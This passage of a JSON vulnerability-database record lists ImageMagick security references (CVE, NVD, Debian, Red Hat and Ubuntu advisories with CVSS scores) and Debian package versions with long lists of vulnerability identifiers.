"reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/f7206618d27c2e69d977abf40e3035a33e5f6be0", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/commit/f7206618d27c2e69d977abf40e3035a33e5f6be0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1554", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1554" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00028.html", "reference_id": "", "reference_type": "", "scores": [], "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00028.html" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4715", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4715" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1767828", "reference_id": "1767828", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1767828" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=941671", "reference_id": "941671", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=941671" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:q16:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:q16:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:q16:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15140", "reference_id": "CVE-2019-15140", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:M/Au:N/C:P/I:P/A:P" }, { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15140" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1036899?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.7.4%2Bdfsg-11%2Bdeb9u8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15mv-khzp-fqfk" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1abc-45xr-5bhb" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-1daq-9kb7-eudz" }, { "vulnerability": "VCID-1e38-tmxy-9kew" }, { "vulnerability": "VCID-1ftp-6fvm-rfez" }, { "vulnerability": "VCID-1gh4-vs86-aufs" }, { "vulnerability": "VCID-1gqw-pheb-hfey" }, { "vulnerability": "VCID-1nrq-kzuy-vyfx" }, { "vulnerability": "VCID-1q1g-ses8-wqae" }, { "vulnerability": "VCID-1q97-afut-4ffy" }, { "vulnerability": "VCID-1x18-b9sa-yygh" }, { "vulnerability": "VCID-1x5f-2jf7-hbb2" }, { "vulnerability": "VCID-25zp-duta-2ffk" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2a2h-yk41-qybt" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2ea6-uaw4-wba9" }, { "vulnerability": "VCID-2fzg-6h13-s7bk" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2ken-ysm1-2ybw" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2pwb-71f5-8ken" }, { "vulnerability": "VCID-2r23-hhkx-9fh6" }, { "vulnerability": "VCID-2wxd-hmac-4fcv" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-38vp-3yf8-aue8" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3dsm-e7ye-wqe1" }, { "vulnerability": "VCID-3fa4-xqhq-2fdq" }, { "vulnerability": "VCID-3fzh-1hk1-3ub1" }, { "vulnerability": "VCID-3pky-3t1q-v3av" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3ubj-wp5c-ruat" }, { "vulnerability": "VCID-3vc6-9vhj-ckb2" }, { "vulnerability": "VCID-3yqe-cntb-t3fb" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-4633-67u6-akg8" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-46gw-xunr-jqbp" }, { "vulnerability": "VCID-477e-a2hz-aqb9" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4dxa-f7vm-7feh" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4kxf-5xrh-uue8" }, { "vulnerability": "VCID-4pzm-24uf-73b6" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-4urn-ywwt-ayeg" }, { "vulnerability": "VCID-5114-9n17-pkd1" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-57gx-fkgs-f7cb" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5fc9-tutn-dubw" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5u53-66es-vkbv" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5y72-4n85-qyeb" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-65b6-jbxy-gudt" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6d5n-tv5h-xkhj" }, { "vulnerability": "VCID-6gh6-3g99-x7hz" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6hay-bjuv-nygd" }, { "vulnerability": "VCID-6jnv-nnkm-v7a3" }, { "vulnerability": "VCID-6kep-3ygd-hkbn" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6wy3-xwez-vfej" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6yn4-p8f4-pbh1" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-73j4-24p8-pbe5" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-78zg-am5w-gugh" }, { "vulnerability": "VCID-79w4-fqmh-j3bk" }, { "vulnerability": "VCID-7dqc-1d5h-uybs" }, { "vulnerability": "VCID-7eeu-wtkq-dyc1" }, { "vulnerability": "VCID-7fw6-fzyj-7qf3" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7jvc-54zg-pbcz" }, { "vulnerability": "VCID-7jx8-htkz-7qd4" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7vrs-x5dn-sbcm" }, { "vulnerability": "VCID-7ynu-qf57-ykba" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-872v-6z75-jucm" }, { "vulnerability": "VCID-8862-dh13-hyga" }, { "vulnerability": "VCID-8an6-y8xy-pyf3" }, { "vulnerability": "VCID-8j37-fwz2-bfea" }, { "vulnerability": "VCID-8jgu-2tx3-gkcb" }, { "vulnerability": "VCID-8n3f-ass1-97gj" }, { "vulnerability": "VCID-8v7y-kcz2-bbb9" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-93a6-7956-v3ar" }, { "vulnerability": "VCID-93em-sxxc-j3ep" }, { "vulnerability": "VCID-99f6-k1y9-x7ba" }, { "vulnerability": "VCID-9akb-t56u-4yhr" }, { "vulnerability": "VCID-9ark-hra3-zyh9" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-9n1x-qw25-mbhf" }, { "vulnerability": "VCID-9pr7-aw96-cqfb" }, { "vulnerability": "VCID-9xbc-3nhd-cygp" }, { "vulnerability": "VCID-9z34-j85g-9kej" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-aycq-4vqg-ubgp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b7dh-gjtk-qfhn" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bf7n-dsx6-rqa2" }, { "vulnerability": "VCID-bge6-p7sc-dqdu" }, { "vulnerability": "VCID-bhkh-rppj-1bb5" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c11x-uq25-17b1" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-chgt-azpf-auba" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-crpp-9mt6-nbb6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-cuyh-2uau-1yad" }, { "vulnerability": "VCID-cwez-6cgj-17gz" }, { "vulnerability": "VCID-cz1h-x2a4-zkhj" }, { "vulnerability": "VCID-d74a-pd2n-6khw" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dge7-469z-u7gq" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dkf5-8kww-mkhn" }, { "vulnerability": "VCID-dkzb-3u3f-yuee" }, { "vulnerability": "VCID-dsee-yrq9-cuca" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-dvvt-ud6y-ffe8" }, { "vulnerability": "VCID-dzxx-5pbd-fqc4" }, { "vulnerability": "VCID-e3av-cqc9-dye1" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb86-ytt7-j3gf" }, { "vulnerability": "VCID-ee5d-s8eb-tbdn" }, { "vulnerability": "VCID-eeah-xwrp-f3b5" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-ekgu-5zg9-2uaa" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-envn-rnvj-4yd2" }, { "vulnerability": "VCID-ep6g-44qy-5qd7" }, { "vulnerability": "VCID-eqr7-q1ga-8kcr" }, { "vulnerability": "VCID-es5w-6nr6-73cn" }, { "vulnerability": "VCID-et5y-g25w-4qay" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-f9z9-h8bt-9bg7" }, { "vulnerability": "VCID-fbta-m4mx-jfap" }, { "vulnerability": "VCID-fd5j-v9vt-5fbu" }, { "vulnerability": "VCID-fds9-yfxw-gqgs" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzct-psgq-8fcb" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g2k2-5sn8-t7dz" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g6mw-mvbu-fbcs" }, { "vulnerability": "VCID-g6sp-5zkq-dkf9" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-gq8m-6nq9-4bcq" }, { "vulnerability": "VCID-gqgz-418x-skd3" }, { "vulnerability": "VCID-gqky-zdxn-e3gd" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h6ps-ukb8-qfa9" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hcjv-e7jt-nbbp" }, { "vulnerability": "VCID-hcxd-bker-sqc1" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hry9-mkha-nfct" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-hzr4-8x4m-87cy" }, { "vulnerability": "VCID-j1jt-g5m8-ffbh" }, { "vulnerability": "VCID-jbhc-41ed-guap" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jcmt-5fes-jug2" }, { "vulnerability": "VCID-je5t-8uuq-ekdk" }, { "vulnerability": "VCID-jjzy-ch18-qkfp" }, { "vulnerability": "VCID-jkdz-rbkr-pygc" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jume-bjh7-f3hr" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-jz9p-mte7-vfb3" }, { "vulnerability": "VCID-k1pr-h6c7-2fgp" }, { "vulnerability": "VCID-k1v6-jp8s-pye7" }, { "vulnerability": "VCID-k7ku-8uya-kbeu" }, { "vulnerability": "VCID-kd82-724m-77h8" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-kq6x-z56m-wqhh" }, { "vulnerability": "VCID-kxus-63yw-sufe" }, { "vulnerability": "VCID-m31q-v2ue-zyh1" }, { "vulnerability": "VCID-m9bk-66wv-vqbk" }, { "vulnerability": "VCID-mcry-3vgm-kyh1" }, { "vulnerability": "VCID-mg1t-vz1h-47b9" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mn7e-8e4j-dqba" }, { "vulnerability": "VCID-mt9h-kjh8-kbdu" }, { "vulnerability": "VCID-mvga-q2ts-mqdh" }, { "vulnerability": "VCID-mwf4-u6v6-zqdu" }, { "vulnerability": "VCID-mws6-wym5-d3f6" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-n59p-w7sh-sbhb" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-ngzz-mwp9-rkdv" }, { "vulnerability": "VCID-nnmr-dnnk-qkc4" }, { "vulnerability": "VCID-nsfn-bhe3-cbd4" }, { "vulnerability": "VCID-nsn7-a7z8-1qcd" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-ny9s-4kcr-tbf4" }, { "vulnerability": "VCID-nzh5-tng5-8qdq" }, { "vulnerability": "VCID-p3p3-suuz-dycr" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p5f8-45e4-ybex" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-paf4-ycea-buae" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-ph82-atva-6kgd" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-pnk5-26uq-w3cu" }, { "vulnerability": "VCID-ps6p-v38m-6qe3" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-pthp-wza7-hkgm" }, { "vulnerability": "VCID-punt-nwt4-uqea" }, { "vulnerability": "VCID-pwhs-ep5j-pqa7" }, { "vulnerability": "VCID-pydk-g827-guc5" }, { "vulnerability": "VCID-q2zg-jh8m-tua2" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qjrj-rdqd-uqdy" }, { "vulnerability": "VCID-qp4x-w3fe-hyer" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rf1t-45cj-mue1" }, { "vulnerability": "VCID-rhpj-r7ym-7kdn" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rwat-s4hf-v7bv" }, { "vulnerability": "VCID-rxgw-h3br-b7dy" }, { "vulnerability": "VCID-rypf-qy6p-3bac" }, { "vulnerability": "VCID-ryu7-2nsu-kqf6" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-rzvc-hba1-zfcy" }, { "vulnerability": "VCID-rzz2-km3v-b3hw" }, { "vulnerability": "VCID-s4cu-swuc-9fh4" }, { "vulnerability": "VCID-s4p8-s262-fqfx" }, { "vulnerability": "VCID-s543-mazj-fqfd" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sat2-d6u2-f3c9" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-sdwh-3s12-17fr" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-szhs-nysy-6bap" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-t4gn-rwz1-ykcf" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-thbh-m54e-z7ca" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tms4-1k6m-cqgd" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tnb2-7mvf-sqdk" }, { "vulnerability": "VCID-tnnn-bg52-93a9" }, { "vulnerability": "VCID-trt9-1y65-53en" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-tv6b-u42h-xkh2" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-tzpa-13fk-7kc9" }, { "vulnerability": "VCID-u23c-4px5-c3g9" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-u9um-rar7-97e8" }, { "vulnerability": "VCID-u9v8-n717-fyag" }, { "vulnerability": "VCID-uatu-64df-b7b8" }, { "vulnerability": "VCID-uayc-3r68-tudp" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-umnw-ksa8-9ua8" }, { "vulnerability": "VCID-upce-8s7m-2kfk" }, { "vulnerability": "VCID-ur14-3rbn-j3ev" }, { "vulnerability": "VCID-urv8-ve9y-e3b4" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v24g-h7t5-nbec" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-v7m7-26bu-wfer" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vbgc-23c4-77hu" }, { "vulnerability": "VCID-vd3a-e897-8bfn" }, { "vulnerability": "VCID-vdum-127b-qfbq" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vp4y-qhc4-nuat" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-vzru-smr4-5kfk" }, { "vulnerability": "VCID-w44j-ecnr-mkhv" }, { "vulnerability": "VCID-w5bd-tn21-fqh7" }, { "vulnerability": "VCID-w8d2-r2ct-m7gv" }, { "vulnerability": "VCID-wbx1-wdxc-k3bc" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-wwxb-6psb-xybx" }, { "vulnerability": "VCID-x3wb-64kk-gues" }, { "vulnerability": "VCID-x65n-6vuk-4ufk" }, { "vulnerability": "VCID-x6sg-6k7v-9qd8" }, { "vulnerability": "VCID-x7us-26aq-3yf8" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xaef-x656-fqfq" }, { "vulnerability": "VCID-xgu5-jypk-h3bd" }, { "vulnerability": "VCID-xgzr-fhu9-myed" }, { "vulnerability": "VCID-xk7c-7f1m-sqe5" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xp3x-q8w4-myhb" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-xtq9-fvcv-kfat" }, { "vulnerability": "VCID-xy5b-m3h2-hbfj" }, { "vulnerability": "VCID-y2nm-f9vb-d7ez" }, { "vulnerability": "VCID-y2pd-cxmz-6yfp" }, { "vulnerability": "VCID-y3xr-bv9y-mqb5" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-ydbk-11w9-wyen" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yqzg-rzp1-bbgm" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-yxwd-j8uj-tudx" }, { "vulnerability": "VCID-z7e5-pt2s-x3a5" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zfw4-5zqw-huh7" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zjgp-g783-d3hy" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zrkc-cfnt-r7hr" }, { "vulnerability": "VCID-zrtt-8nnj-v3ch" }, { "vulnerability": "VCID-zs46-dubn-wfga" }, { "vulnerability": "VCID-zszf-nytw-jqgx" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" }, { "vulnerability": "VCID-zyg9-ad7g-ayex" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.7.4%252Bdfsg-11%252Bdeb9u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": 